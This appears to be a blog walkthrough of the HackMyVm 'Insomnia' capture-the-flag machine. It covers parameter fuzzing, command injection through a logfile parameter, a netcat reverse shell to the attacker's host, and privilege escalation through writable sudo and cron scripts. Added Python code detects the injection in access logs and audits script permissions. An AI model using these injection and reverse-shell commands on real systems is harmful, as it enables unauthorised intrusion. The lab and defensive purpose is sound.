Windy's little blog

All the odds and ends of everyday life, and I like CTF.

HackMyVm Insomnia Walkthrough (RCE)

The machine can be downloaded here.



Scan the ports with Nmap.



Enumerate files and directories with Gobuster.



The main page shows a chat window.



chat.txt contains the chat history.



Visiting administration.php returns an error.



administration.php probably expects a query parameter, so fuzz parameter names with wfuzz:

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt 'http://192.168.56.56:8080/administration.php?FUZZ=test'



Hide the 65-character responses (the baseline) with --hh 65 to spot a parameter that changes the output:

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hh 65 'http://192.168.56.56:8080/administration.php?FUZZ=test'



The logfile parameter is found. Try appending a command to its value:

curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;id

Then check chat.txt for the output.



The logfile parameter gives remote command execution, so get a reverse shell:

curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;nc%20192.168.56.100%201234%20-e%20/bin/bash

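From the defender's side, the injection above leaves a clear trace in the web server's access log: a query-string value that contains a shell metacharacter followed by a program name. The Python script below is an added example written for this walkthrough, not code from the machine or from its author. It parses constructed access-log lines modelled on the requests above and flags such values; the log format, the token list and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Combined-format access log line; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Characters that end one shell command and start another inside a string
# that is handed to a shell (the logfile=administration.php;id pattern).
SHELL_META = re.compile(r'[;|&`\n]|\$\(')

# Program names that typically follow the metacharacter in an injected value.
# The boundaries exclude '-' and word characters, so "/bin/bash" and ";id"
# match while "my-bash" or "valid" do not.
CMD_TOKENS = re.compile(
    r'(?<![\w-])(?:nc|ncat|bash|sh|id|whoami|curl|wget|python\d?|perl)(?![\w-])'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(target):
    """Split the query string of a request target into decoded (name, value) pairs.

    Splitting is done by hand on '&' so that a ';' inside a value survives;
    some urllib versions treat ';' as a separator and would hide the payload.
    """
    pairs = []
    for part in urlsplit(target).query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_value(value):
    """Return 'high', 'medium' or None for one decoded parameter value."""
    if SHELL_META.search(value) is None:
        return None
    return 'high' if CMD_TOKENS.search(value) else 'medium'


def scan(lines):
    """Return one finding per suspicious query parameter across the given log lines."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in query_params(rec['target']):
            level = classify_value(value)
            if level is not None:
                findings.append({
                    'ip': rec['ip'], 'ts': rec['ts'], 'param': name,
                    'value': value, 'severity': level,
                })
    return findings


# Constructed sample log lines modelled on the requests in this walkthrough;
# they are not a real log from the machine.
SAMPLE_LOG = [
    '192.168.56.100 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '192.168.56.100 - - [01/Jan/2024:10:00:05 +0000] "GET /administration.php?logfile=administration.php HTTP/1.1" 200 65',
    '192.168.56.100 - - [01/Jan/2024:10:00:09 +0000] "GET /administration.php?logfile=administration.php;id HTTP/1.1" 200 65',
    '192.168.56.100 - - [01/Jan/2024:10:00:14 +0000] "GET /administration.php?logfile=administration.php;nc%20192.168.56.100%201234%20-e%20/bin/bash HTTP/1.1" 200 65',
    '192.168.56.100 - - [01/Jan/2024:10:00:20 +0000] "GET /search.php?q=foo%3Bbar HTTP/1.1" 200 300',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ts']} {f['ip']} {f['param']}={f['value']!r}")
```

The root cause is a parameter that reaches a shell unchanged; the server-side fix is to resolve logfile against an allowlist of known log names and never build a command string from it. The detector above is a log-review aid, not a substitute for that fix.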


Check the sudo rights of the current user:

sudo -l



start.sh can be run as julia through sudo, so inspect it:

cat /var/www/html/start.sh



The script is writable, so overwrite it with a shell and run it as julia:

echo bash >/var/www/html/start.sh
sudo -u julia /bin/bash /var/www/html/start.sh



Check the crontab.



Append a reverse shell to check.sh and wait for cron to run it.

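Both privilege escalations on this machine rely on the same misconfiguration: a script executed with higher privilege (start.sh through sudo, check.sh through cron) that a lower-privileged user can write to. The Python script below is an added example, not part of the original post, that audits the files referenced by crontab and sudoers lines for exactly that: an untrusted owner, group or world write permission, and a world-writable parent directory. It runs against constructed rules and temporary files, so the paths, users and rule text are assumptions.

```python
import os
import re
import stat
import tempfile

# An absolute path that is not glued to other non-space text, so the "*/5"
# of a cron schedule is not mistaken for a path.
PATH_RE = re.compile(r'(?<!\S)(/[\w./-]+)')


def extract_paths(rule_text):
    """Return absolute paths mentioned in crontab or sudoers lines, in order, without duplicates."""
    paths = []
    for line in rule_text.splitlines():
        line = line.strip()
        # Skip blank lines, comments and environment settings such as SHELL=/bin/sh.
        if not line or line.startswith('#') or re.match(r'^\w+=', line):
            continue
        for p in PATH_RE.findall(line):
            if p not in paths:
                paths.append(p)
    return paths


def audit_path(path, trusted_uids=(0,)):
    """List the ways a lower-privileged user could change a file that runs with higher privilege."""
    problems = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ['missing']
    if st.st_uid not in trusted_uids:
        problems.append(f'owned by uid {st.st_uid}, which is not trusted')
    if st.st_mode & stat.S_IWGRP:
        problems.append('group-writable')
    if st.st_mode & stat.S_IWOTH:
        problems.append('world-writable')
    parent = os.stat(os.path.dirname(path) or '/')
    # A world-writable parent without the sticky bit lets anyone replace the file outright.
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        problems.append('parent directory world-writable without sticky bit')
    return problems


def audit_rules(rule_text, trusted_uids=(0,)):
    """Map every file referenced by the rules to its list of problems (an empty list means clean)."""
    return {p: audit_path(p, trusted_uids)
            for p in extract_paths(rule_text) if not os.path.isdir(p)}


def demo():
    """Constructed example: one safe script and one world-writable script referenced by cron and sudo rules.

    Returns (report, safe_path, writable_path) so a caller can inspect the result.
    """
    workdir = tempfile.mkdtemp()
    safe = os.path.join(workdir, 'start.sh')
    writable = os.path.join(workdir, 'check.sh')
    for path, mode in ((safe, 0o755), (writable, 0o777)):
        with open(path, 'w') as fh:
            fh.write('#!/bin/bash\necho ok\n')
        os.chmod(path, mode)
    # Constructed rule text; the user names and schedule are assumptions.
    rules = f"""
# constructed /etc/crontab excerpt
SHELL=/bin/sh
*/1 * * * * julia {writable}
# constructed sudoers excerpt
www-data ALL=(julia) NOPASSWD: /bin/bash {safe}
"""
    # The current user created the files, so it counts as trusted for the demo.
    return audit_rules(rules, trusted_uids=(0, os.getuid())), safe, writable


if __name__ == '__main__':
    report, _, _ = demo()
    for path, problems in report.items():
        print(path, '->', ', '.join(problems) or 'ok')
```

Run against real /etc/crontab, /etc/cron.d/* and sudoers content, the trusted uid set should contain only root and the account the rule runs as; a script owned by the web server user but executed as julia or root is the finding that matters here.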
